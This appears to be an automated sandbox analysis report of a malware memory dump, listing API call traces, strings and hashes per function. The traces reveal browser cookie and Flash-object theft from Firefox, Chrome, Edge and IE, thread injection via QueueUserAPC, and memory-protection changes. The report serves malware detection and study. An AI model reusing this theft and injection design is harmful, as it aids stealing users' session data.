API ID: Heap$AllocateFreeQueryValuememcpy$CallCloseErrorLastNamedPipelstrlen
String ID: Scr
API String ID: 730886825-1633706383
Opcode ID: 783d01decb3d3f23d316bc63b5de73f39fb4d5e1411feaa60e1224aa46b1336e
Instruction ID: 255f72b863055cb251d5065db15bc8cd732a5f7b0ed141667d94d3e6d2bb2f26
Opcode Fuzzy Hash: 783d01decb3d3f23d316bc63b5de73f39fb4d5e1411feaa60e1224aa46b1336e
Instruction Fuzzy Hash: D101D671965204FADB11AB91CD05FDF7FADEB45754F00405AFA06A2190DAB0AE40D662

Uniqueness

Uniqueness Score: -1.00%

Function 009B9882, Relevance: 3.0, APIs: 2, Instructions: 32COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(009DE240), ref: 009B988C
RtlLeaveCriticalSection.NTDLL(009DE240), ref: 009B98C8

Part of subcall function 009BEC30: lstrlen.KERNEL32(?,?,00000000,?,009B6222,009DD4E4,?,?,00000004,00000000,?,00000000,009BB275,?,?), ref: 009BEC7D
Part of subcall function 009BEC30: VirtualProtect.KERNELBASE(00000000,00000000,00000040,-0000001C,?,00000000,?,009B6222,009DD4E4,?,?,00000004,00000000,?,00000000,009BB275), ref: 009BEC8F
Part of subcall function 009BEC30: lstrcpy.KERNEL32(00000000,?), ref: 009BEC9E
Part of subcall function 009BEC30: VirtualProtect.KERNELBASE(00000000,00000000,?,-0000001C,?,00000000,?,009B6222,009DD4E4,?,?,00000004,00000000,?,00000000,009BB275), ref: 009BECAF

Part of subcall function 009C4FB0: HeapFree.KERNEL32(00000000,00000200,009C6EB2,00000000,00000100,00000200), ref: 009C4FBC

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: CriticalProtectSectionVirtual$EnterFreeHeapLeavelstrcpylstrlen
String ID:
API String ID: 1872894792-0
Opcode ID: fa946ae4f0d3d2362ca43aa09d3c52a7a391378b8760635d6d3be4ec86315d83
Instruction ID: 67a4ad8088cdf5206d2981cbfa91803f3794f8ad4e1b17f81daee31752abab43
Opcode Fuzzy Hash: fa946ae4f0d3d2362ca43aa09d3c52a7a391378b8760635d6d3be4ec86315d83
Instruction Fuzzy Hash: 5AF0E5366522149FC7207F98D985CA6FBACEBDA330305816FEB515B352CB725C418A90

Uniqueness

Uniqueness Score: -1.00%

Function 009C1884, Relevance: 3.0, APIs: 2, Instructions: 27COMMON

Download Yara Rule

APIs

InterlockedIncrement.KERNEL32(009DDF5C), ref: 009C1899

Part of subcall function 009BA027: GetSystemTimeAsFileTime.KERNEL32(?), ref: 009BA052
Part of subcall function 009BA027: HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 009BA05F
Part of subcall function 009BA027: NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 009BA0EB
Part of subcall function 009BA027: GetModuleHandleA.KERNEL32(00000000), ref: 009BA0F6
Part of subcall function 009BA027: RtlImageNtHeader.NTDLL(00000000), ref: 009BA0FF
Part of subcall function 009BA027: RtlExitUserThread.NTDLL(00000000), ref: 009BA114

InterlockedDecrement.KERNEL32(009DDF5C), ref: 009C18BD

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: InterlockedThreadTime$CreateDecrementExitFileHandleHeaderHeapImageIncrementInformationModuleQuerySystemUser
String ID:
API String ID: 1011034841-0
Opcode ID: 457a566533b1cb01a706e5b5a56c9b5560db886e9e36cc65abcf8b8e80eec14f
Instruction ID: 25592cbde9aa4836fd56efe233833e1c5dd48f11caa7301e250dd130f87097b1
Opcode Fuzzy Hash: 457a566533b1cb01a706e5b5a56c9b5560db886e9e36cc65abcf8b8e80eec14f
Instruction Fuzzy Hash: 1CE09235A9C222679B213BA8EC14F5B6B99ABA2744F00452DF545D0053C710C8409697

Uniqueness

Uniqueness Score: -1.00%

Function 009B4926, Relevance: 2.6, APIs: 2, Instructions: 70memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 009C9D35: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 009C9D6E
Part of subcall function 009C9D35: VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 009C9DA4
Part of subcall function 009C9D35: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 009C9DB0
Part of subcall function 009C9D35: lstrcmpi.KERNEL32(?,00000000), ref: 009C9DED
Part of subcall function 009C9D35: StrChrA.SHLWAPI(?,0000002E), ref: 009C9DF6
Part of subcall function 009C9D35: lstrcmpi.KERNEL32(?,00000000), ref: 009C9E08
Part of subcall function 009C9D35: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 009C9E59

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,?,009DA5A8,0000002C,009C9AAA,NTDLL.DLL,6547775A,?,009B1224), ref: 009B4965

Part of subcall function 009CAC94: GetProcAddress.KERNEL32(6F57775A,00000000), ref: 009CACBD
Part of subcall function 009CAC94: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,009C6D3E,00000000,00000000,00000028,00000100), ref: 009CACDF

VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,?,009DA5A8,0000002C,009C9AAA,NTDLL.DLL,6547775A,?,009B1224), ref: 009B49F0

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Virtual$AllocFree$lstrcmpi$AddressMemory64ProcReadWow64
String ID:
API String ID: 4138075514-0
Opcode ID: 7c71c8c079ec987895e7886c9ef56dd3995e684d314e1ee017cefeafd1c9e90a
Instruction ID: 216b05efeae0a6198372861c41b4f745d156f8a300c18a65d8dba8f6a9d0a379
Opcode Fuzzy Hash: 7c71c8c079ec987895e7886c9ef56dd3995e684d314e1ee017cefeafd1c9e90a
Instruction Fuzzy Hash: E2211375D41228ABCF11DFA5DD80ADEBBB4FF48B20F20812AF914B2251D3344A45DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 009D2B84, Relevance: 1.6, APIs: 1, Instructions: 52processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 009D2BD6

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 59b915fa4e3593c28e3eb6acf28f49a5b9f3338c143d442a90dcfccbb824531e
Instruction ID: 5345db1d216229eefd7d1ae7da72226aa6065e2e436b43cbd0821034a61019e9
Opcode Fuzzy Hash: 59b915fa4e3593c28e3eb6acf28f49a5b9f3338c143d442a90dcfccbb824531e
Instruction Fuzzy Hash: 22115B32645209AFDF019FA9DC40ADA7BAAEF59370B05812AFD2896220C775DD21DB90

Uniqueness

Uniqueness Score: -1.00%

Function 009BD9EB, Relevance: 1.5, APIs: 1, Instructions: 15threadCOMMON

Download Yara Rule

APIs

Part of subcall function 009C1F00: GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,009DE088,00000000,009BD9F2,?,009B9809,?), ref: 009C1F1F
Part of subcall function 009C1F00: PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,009DE088,00000000,009BD9F2,?,009B9809,?), ref: 009C1F2A
Part of subcall function 009C1F00: _wcsupr.NTDLL ref: 009C1F37
Part of subcall function 009C1F00: lstrlenW.KERNEL32(00000000), ref: 009C1F3F

ResumeThread.KERNEL32(00000004,?,009B9809,?), ref: 009BDA00

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: FileName$FindImagePathProcessResumeThread_wcsuprlstrlen
String ID:
API String ID: 3646851950-0
Opcode ID: 513351a854543b33757ffe1ebff2894baf088045fcdd4321e84a248c2a34ede8
Instruction ID: afcdfcd77a743831b078b22b493297f671f3e7ff21d9d8e387654521ffdf9a65
Opcode Fuzzy Hash: 513351a854543b33757ffe1ebff2894baf088045fcdd4321e84a248c2a34ede8
Instruction Fuzzy Hash: 4AD05E3024D301AADB226B20CE05B56BE91BFA1BA5F00C81DF9C6501A6E7318810E60D

Uniqueness

Uniqueness Score: -1.00%

Function 009D658F, Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009D659C

Part of subcall function 009D66AC: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,0002A594,009B0000), ref: 009D6725

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: bc9516a839521d15fea8856e2d8fffb0cf338b1027655802b6ceefcafc0b57e9
Instruction ID: daaeac468dec60d4d7ca1568df51215270daf95418ed4b322757524183872588
Opcode Fuzzy Hash: bc9516a839521d15fea8856e2d8fffb0cf338b1027655802b6ceefcafc0b57e9
Instruction Fuzzy Hash: CFA022C22E82023C30082B003C03E3F022CC0C0F2A330C80FF000E0380E88C2C808032

Uniqueness

Uniqueness Score: -1.00%

Function 009D65AA, Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009D659C

Part of subcall function 009D66AC: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,0002A594,009B0000), ref: 009D6725

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: a7ea70c27746f64b2905e8f473b4b331fa3d209f52e5e7f11b3bb0a2d8d4fba7
Instruction ID: 0822dee8365d8dedd315e7ae18fb772a4b2ef2f04beb9e3c525c22f59e5de3ac
Opcode Fuzzy Hash: a7ea70c27746f64b2905e8f473b4b331fa3d209f52e5e7f11b3bb0a2d8d4fba7
Instruction Fuzzy Hash: 8CA011C22E8002BC30082A003C02E3B022CC0C8B22330C80BB00280280E8882C808032

Uniqueness

Uniqueness Score: -1.00%

Function 009D247D, Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000200,009C6D11), ref: 009D2489

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 7bad86dc9dccebbe1d19a28b111a9a67dd9edc9fd3e8aaf9be1c3196392b8639
Instruction ID: 3eabf9457a3a2b41d77046559d4bb8de433ee4a0ed3177e451d38ca02edaa9a9
Opcode Fuzzy Hash: 7bad86dc9dccebbe1d19a28b111a9a67dd9edc9fd3e8aaf9be1c3196392b8639
Instruction Fuzzy Hash: 90B012350AA100ABCA014B20ED04F067B31B760700F108412B205400B0863104A1FB04

Uniqueness

Uniqueness Score: -1.00%

Function 009C4F76, Relevance: 1.3, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 009C4F80

Part of subcall function 009CE866: RegOpenKeyExA.KERNELBASE(009C4F98,00000000,00000000,00020119,80000001,00000000,Software\AppDataLow\Software\Microsoft\,00000000,?,009DE130,009C4F98,009C15E7,80000001,?,009C15E7), ref: 009CE89F
Part of subcall function 009CE866: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,?,?,009C15E7), ref: 009CE8B3
Part of subcall function 009CE866: RegCloseKey.KERNELBASE(?,?,Client32,?,?,?,009C15E7), ref: 009CE8FC

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Open$Closememset
String ID:
API String ID: 1685373161-0
Opcode ID: e0687e6f58cfad2a21941a97c3c994ebabc033b97c44297dbb8b3ae019ffb63b
Instruction ID: 9eac42ac9181910c82762eecb5d09cfa7071dc6dd2beaa6bc9964546b2067b26
Opcode Fuzzy Hash: e0687e6f58cfad2a21941a97c3c994ebabc033b97c44297dbb8b3ae019ffb63b
Instruction Fuzzy Hash: 36E0173064010CB7DF207F55CC02F893B59AF50790F00C028FE086D162D772EBA4A786

Uniqueness

Uniqueness Score: -1.00%

Function 009B49D6, Relevance: 1.3, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,?,009DA5A8,0000002C,009C9AAA,NTDLL.DLL,6547775A,?,009B1224), ref: 009B49F0

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 812e8abb56a0635c1105b8f5749b46c666aa5cc705642578a971f0fc7ff0b94b
Instruction ID: e0622776a2429b9644af655dcbca352adf92d108b5ad23b54677525da15b59bc
Opcode Fuzzy Hash: 812e8abb56a0635c1105b8f5749b46c666aa5cc705642578a971f0fc7ff0b94b
Instruction Fuzzy Hash: 2BD0E235D05619EBCB209B98D846ADFFB70BB08720F608225E960631A1C62019169B90

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 009B5ECA, Relevance: 58.0, APIs: 16, Strings: 17, Instructions: 226memorystringfileCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(%APPDATA%,009D6CE0,00000000,?,00000000,009B23FE), ref: 009B5EE2

Part of subcall function 009C888D: lstrlenW.KERNEL32(?,00000000,%APPDATA%\Mozilla\Firefox\Profiles,?,00000250,?,00000000), ref: 009C88D9
Part of subcall function 009C888D: lstrlenW.KERNEL32(?,?,00000000), ref: 009C88E5
Part of subcall function 009C888D: memset.NTDLL ref: 009C892D
Part of subcall function 009C888D: FindFirstFileW.KERNEL32(00000000,00000000), ref: 009C8948
Part of subcall function 009C888D: lstrlenW.KERNEL32(0000002C), ref: 009C8980
Part of subcall function 009C888D: lstrlenW.KERNEL32(?), ref: 009C8988
Part of subcall function 009C888D: memset.NTDLL ref: 009C89AB
Part of subcall function 009C888D: wcscpy.NTDLL ref: 009C89BD

Part of subcall function 009C888D: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 009C89E3
Part of subcall function 009C888D: RtlEnterCriticalSection.NTDLL(?), ref: 009C8A18
Part of subcall function 009C888D: RtlLeaveCriticalSection.NTDLL(?), ref: 009C8A34
Part of subcall function 009C888D: FindNextFileW.KERNEL32(?,00000000), ref: 009C8A4D
Part of subcall function 009C888D: WaitForSingleObject.KERNEL32(00000000), ref: 009C8A5F
Part of subcall function 009C888D: FindClose.KERNEL32(?), ref: 009C8A74
Part of subcall function 009C888D: FindFirstFileW.KERNEL32(00000000,00000000), ref: 009C8A88
Part of subcall function 009C888D: lstrlenW.KERNEL32(0000002C), ref: 009C8AAA

RtlAllocateHeap.NTDLL(00000000,00000036,%APPDATA%\Mozilla\Firefox\Profiles), ref: 009B5F29
memcpy.NTDLL(00000000,%APPDATA%,00000000,?,00000000,009B23FE), ref: 009B5F3E
lstrcpyW.KERNEL32(00000000,\Macromedia\Flash Player\), ref: 009B5F4E

Part of subcall function 009C888D: FindNextFileW.KERNEL32(?,00000000), ref: 009C8B20
Part of subcall function 009C888D: WaitForSingleObject.KERNEL32(00000000), ref: 009C8B32
Part of subcall function 009C888D: FindClose.KERNEL32(?), ref: 009C8B4D

HeapFree.KERNEL32(00000000,00000000,00000000,*.sol,?,00000000,00000000,00000010,?,?,00000000,009B23FE), ref: 009B5F72
RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 009B5F8A
HeapFree.KERNEL32(00000000,00000000,?,00000000,009B23FE), ref: 009B5FD6
lstrlenW.KERNEL32(00000000,%userprofile%\AppData\Local\,?,00000000,009B23FE), ref: 009B5FF5
RtlAllocateHeap.NTDLL(00000000,?), ref: 009B6007
HeapFree.KERNEL32(00000000,00000000,00000000,cookies,?,00000000,00000000,00000014,?,00000000,009B23FE), ref: 009B605E
HeapFree.KERNEL32(00000000,00000000,?,00000000,009B23FE), ref: 009B6070
CreateDirectoryW.KERNEL32(00000000,00000000,%userprofile%\AppData\Local\,?,00000000,009B23FE), ref: 009B6097
lstrlenW.KERNEL32(\cookie.ie,%userprofile%\AppData\Local\,?,00000000,009B23FE), ref: 009B60DD
DeleteFileW.KERNEL32(?,%userprofile%\AppData\Local\,?,00000000,009B23FE), ref: 009B6106
HeapFree.KERNEL32(00000000,?,?,00000000,009B23FE), ref: 009B6114
HeapFree.KERNEL32(00000000,?,?,00000000,009B23FE), ref: 009B6137

Strings

%APPDATA%, xrefs: 009B5ED5, 009B5F38
\cookie.ie, xrefs: 009B60D7
\Macromedia\Flash Player\, xrefs: 009B5F46
*.txt, xrefs: 009B5FAB
*.sol, xrefs: 009B5F5D
\sols, xrefs: 009B60E5
\cookie.cr, xrefs: 009B60C9
Google\Chrome\User Data\Default, xrefs: 009B600F
%userprofile%\AppData\Local\, xrefs: 009B5FDC
cookies.sqlite-journal, xrefs: 009B5F10
cookies, xrefs: 009B6027, 009B6049
*.cookie, xrefs: 009B5FC1
Microsoft\Edge\User Data\Default, xrefs: 009B6032
%APPDATA%\Mozilla\Firefox\Profiles, xrefs: 009B5EFA, 009B5EFF, 009B5F15
cookies.sqlite, xrefs: 009B5EF5
\cookie.ff, xrefs: 009B60D0, 009B60DC
\cookie.ed, xrefs: 009B60C2

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Heap$lstrlen$Find$FileFree$Allocate$CloseCriticalFirstNextObjectSectionSingleWaitmemset$CreateDeleteDirectoryEnterLeaveNamePathlstrcpymemcpywcscpy
String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$%userprofile%\AppData\Local\$*.cookie$*.sol$*.txt$Google\Chrome\User Data\Default$Microsoft\Edge\User Data\Default$\Macromedia\Flash Player\$\cookie.cr$\cookie.ed$\cookie.ff$\cookie.ie$\sols$cookies$cookies.sqlite$cookies.sqlite-journal
API String ID: 659829602-1887243743
Opcode ID: ff0b34bcc72bb093ae588f042b820461c7388d0aff8de7cef6884cea95c4d61e
Instruction ID: 47d38a8fdcaf0084c50c3a871af8e6f89e5d831aa1db750b96ebec9ac5502f79
Opcode Fuzzy Hash: ff0b34bcc72bb093ae588f042b820461c7388d0aff8de7cef6884cea95c4d61e
Instruction Fuzzy Hash: 8B614831599304BFC320AF65DD89EAB7BECEBD9B04F00493AF502D2252DA609D45D771

Uniqueness

Uniqueness Score: -1.00%

Function 009BE0BA, Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 224memoryfiletimeCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,63699BC3,.dll), ref: 009BE0E8
RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 009BE10B
memset.NTDLL ref: 009BE126

Part of subcall function 009C3996: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,63699BCE,009BE13F,73797325), ref: 009C39A7
Part of subcall function 009C3996: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 009C39C1

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 009BE167
GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 009BE17D
CloseHandle.KERNEL32(?), ref: 009BE197
StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 009BE1A4
lstrcat.KERNEL32(?,642E2A5C), ref: 009BE1E9
FindFirstFileA.KERNEL32(?,?), ref: 009BE1FE
CompareFileTime.KERNEL32(?,?), ref: 009BE21C
FindNextFileA.KERNEL32(?,?), ref: 009BE22F
FindClose.KERNEL32(?), ref: 009BE23D
FindFirstFileA.KERNEL32(?,?), ref: 009BE248
CompareFileTime.KERNEL32(?,?), ref: 009BE268
StrChrA.SHLWAPI(?,0000002E), ref: 009BE2A0
memcpy.NTDLL(?,?,00000000), ref: 009BE2D6
FindNextFileA.KERNEL32(?,?), ref: 009BE2EB
FindClose.KERNEL32(?), ref: 009BE2F9
FindFirstFileA.KERNEL32(?,?), ref: 009BE304
CompareFileTime.KERNEL32(?,?), ref: 009BE314
FindClose.KERNEL32(?), ref: 009BE34D
HeapFree.KERNEL32(00000000,?,73797325), ref: 009BE360
HeapFree.KERNEL32(00000000,?), ref: 009BE371

Strings

.dll, xrefs: 009BE0D3

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$CreateHandlelstrcatmemcpymemset
String ID: .dll
API String ID: 455834338-2738580789
Opcode ID: 9823f30dcfd470aba7d84363d66690c54f6956924ef8c2c68a9eb7e6e462d628
Instruction ID: 5ddc28fbda72da7f13c3aabbbe8bafa1283803ef004c16225a51e40d11424b39
Opcode Fuzzy Hash: 9823f30dcfd470aba7d84363d66690c54f6956924ef8c2c68a9eb7e6e462d628
Instruction Fuzzy Hash: 8B814472519301AFD710DF24DD84EABBBEDBB88350F00092EF595D22A1E770D988DB62

Uniqueness

Uniqueness Score: -1.00%

Function 009C888D, Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 233stringfilesynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 009D247D: RtlAllocateHeap.NTDLL(00000000,00000200,009C6D11), ref: 009D2489

Part of subcall function 009B9689: ExpandEnvironmentStringsW.KERNEL32(009D1384,00000000,00000000,00000001,00000000,00000000,?,009D1384,00000000), ref: 009B96A0
Part of subcall function 009B9689: ExpandEnvironmentStringsW.KERNEL32(009D1384,00000000,00000000,00000000), ref: 009B96BA

lstrlenW.KERNEL32(?,00000000,%APPDATA%\Mozilla\Firefox\Profiles,?,00000250,?,00000000), ref: 009C88D9
lstrlenW.KERNEL32(?,?,00000000), ref: 009C88E5
memset.NTDLL ref: 009C892D
FindFirstFileW.KERNEL32(00000000,00000000), ref: 009C8948
lstrlenW.KERNEL32(0000002C), ref: 009C8980
lstrlenW.KERNEL32(?), ref: 009C8988
memset.NTDLL ref: 009C89AB
wcscpy.NTDLL ref: 009C89BD
PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 009C89E3
RtlEnterCriticalSection.NTDLL(?), ref: 009C8A18

Part of subcall function 009C4FB0: HeapFree.KERNEL32(00000000,00000200,009C6EB2,00000000,00000100,00000200), ref: 009C4FBC

RtlLeaveCriticalSection.NTDLL(?), ref: 009C8A34
FindNextFileW.KERNEL32(?,00000000), ref: 009C8A4D
WaitForSingleObject.KERNEL32(00000000), ref: 009C8A5F
FindClose.KERNEL32(?), ref: 009C8A74
FindFirstFileW.KERNEL32(00000000,00000000), ref: 009C8A88
lstrlenW.KERNEL32(0000002C), ref: 009C8AAA
FindNextFileW.KERNEL32(?,00000000), ref: 009C8B20
WaitForSingleObject.KERNEL32(00000000), ref: 009C8B32
FindClose.KERNEL32(?), ref: 009C8B4D

Strings

%APPDATA%\Mozilla\Firefox\Profiles, xrefs: 009C88CD

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Find$Filelstrlen$CloseCriticalEnvironmentExpandFirstHeapNextObjectSectionSingleStringsWaitmemset$AllocateEnterFreeLeaveNamePathwcscpy
String ID: %APPDATA%\Mozilla\Firefox\Profiles
API String ID: 2962561936-3215297822
Opcode ID: 478129e0928da15647df981c9be3222e000379299dd47e6f7c355bb0b54134ad
Instruction ID: 9822b70964b16a854a3a924d973ac1718129371c008ac778d5f08f2a5f4e0cb2
Opcode Fuzzy Hash: 478129e0928da15647df981c9be3222e000379299dd47e6f7c355bb0b54134ad
Instruction Fuzzy Hash: 188159B1918305AFC751AF25DC84F2BBBE9FF88344F04482EF595962A2DB74DC448B62

Uniqueness

Uniqueness Score: -1.00%

Function 009BA7B1, Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 65threadprocesslibraryCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,747DF5B0,009C7D3D,61636F4C,00000001,?,?), ref: 009BA7D7
CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 009BA7E3
GetModuleHandleA.KERNEL32(KERNEL32.DLL,ExitProcess,?,00000000,00000000), ref: 009BA7FA
GetProcAddress.KERNEL32(00000000), ref: 009BA801
Thread32First.KERNEL32(?,0000001C), ref: 009BA811
OpenThread.KERNEL32(001F03FF,00000000,009C7D3D), ref: 009BA82C
QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 009BA83D
CloseHandle.KERNEL32(00000000), ref: 009BA844
Thread32Next.KERNEL32(?,0000001C), ref: 009BA84D
CloseHandle.KERNEL32(?), ref: 009BA859

Strings

t, xrefs: 009BA7FA
ExitProcess, xrefs: 009BA7F0
KERNEL32.DLL, xrefs: 009BA7F5

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Handle$Close$Thread32$AddressCreateFirstModuleNextOpenProcQueueSnapshotThreadToolhelp32User
String ID: ExitProcess$KERNEL32.DLL$t
API String ID: 2341152533-2965082341
Opcode ID: 64e121fae61cf6276819b3084ff29c70c6db9e04b2da69f229b02deacca4bece
Instruction ID: 2a00c4d3e8ad395e1372b3708ff7ba4027b7871b459c95471dbcbf040d501055
Opcode Fuzzy Hash: 64e121fae61cf6276819b3084ff29c70c6db9e04b2da69f229b02deacca4bece
Instruction Fuzzy Hash: F9118E72944118FFDF006FA0DD85DEE7B79EF483A5F00403AFA01A61A1DB708D869BA1

Uniqueness

Uniqueness Score: -1.00%

Function 009B62FA, Relevance: 21.4, APIs: 11, Strings: 1, Instructions: 361memoryCOMMON

Download Yara Rule

APIs

StrToIntExA.SHLWAPI(00000000,00000000,?,747DF710,00000000,00000000,?,?,009D58C6,?,?,?,?,?,009B20D2,?), ref: 009B6330
StrToIntExA.SHLWAPI(00000000,00000000,?,747DF710,00000000,00000000,?,?,009D58C6,?,?,?,?,?,009B20D2,?), ref: 009B6362
StrToIntExA.SHLWAPI(00000000,00000000,?,747DF710,00000000,00000000,?,?,009D58C6,?,?,?,?,?,009B20D2,?), ref: 009B6394
StrToIntExA.SHLWAPI(00000000,00000000,?,747DF710,00000000,00000000,?,?,009D58C6,?,?,?,?,?,009B20D2,?), ref: 009B63C6
StrToIntExA.SHLWAPI(00000000,00000000,?,747DF710,00000000,00000000,?,?,009D58C6,?,?,?,?,?,009B20D2,?), ref: 009B63F8
StrToIntExA.SHLWAPI(00000000,00000000,?,747DF710,00000000,00000000,?,?,009D58C6,?,?,?,?,?,009B20D2,?), ref: 009B642A
StrToIntExA.SHLWAPI(00000000,00000000,?,747DF710,00000000,00000000,?,?,009D58C6,?,?,?,?,?,009B20D2,?), ref: 009B645C
StrToIntExA.SHLWAPI(00000000,00000000,?,747DF710,00000000,00000000,?,?,009D58C6,?,?,?,?,?,009B20D2,?), ref: 009B648E
StrToIntExA.SHLWAPI(00000000,00000000,?,747DF710,00000000,00000000,?,?,009D58C6,?,?,?,?,?,009B20D2,?), ref: 009B64C0
HeapFree.KERNEL32(00000000,?,Scr,?,?,747DF710,00000000,00000000,?,?,009D58C6,?,?), ref: 009B6523

Part of subcall function 009C84CA: RtlEnterCriticalSection.NTDLL(06288D20), ref: 009C84D3
Part of subcall function 009C84CA: HeapFree.KERNEL32(00000000,?,?,?,009D58C6,?,?,?,?,?,009B20D2,?), ref: 009C8505
Part of subcall function 009C84CA: RtlLeaveCriticalSection.NTDLL(06288D20), ref: 009C8523

StrToIntExA.SHLWAPI(00000000,00000000,?,747DF710,00000000,00000000,?,?,009D58C6,?,?,?,?,?,009B20D2,?), ref: 009B654E

Strings

Scr, xrefs: 009B6502

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: CriticalFreeHeapSection$EnterLeave
String ID: Scr
API String ID: 1298188129-1633706383
Opcode ID: d1a4b334bdd8bb14e56ed6651adba689b0cbe8450dcd0aab4698f82f131508bf
Instruction ID: be6d067b624f10808b1e44fcefb0c624760616ba9f4f6b0fbf2643c10226f30a
Opcode Fuzzy Hash: d1a4b334bdd8bb14e56ed6651adba689b0cbe8450dcd0aab4698f82f131508bf
Instruction Fuzzy Hash: 7AB1D471B25211AB8B20EF75CE84FEB27DC9B497607144839B805CB159DABCFC40DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 009C05EF, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 91memorystringsynchronizationCOMMON

Download Yara Rule

APIs

wcscpy.NTDLL ref: 009C061C
GetLogicalDriveStringsW.KERNEL32(00000000,00000000), ref: 009C0628
RtlAllocateHeap.NTDLL(00000000,?), ref: 009C0639
memset.NTDLL ref: 009C0656
GetLogicalDriveStringsW.KERNEL32(?,?), ref: 009C0664
WaitForSingleObject.KERNEL32(00000000), ref: 009C0672
GetDriveTypeW.KERNEL32(?), ref: 009C0680
lstrlenW.KERNEL32(?), ref: 009C068C
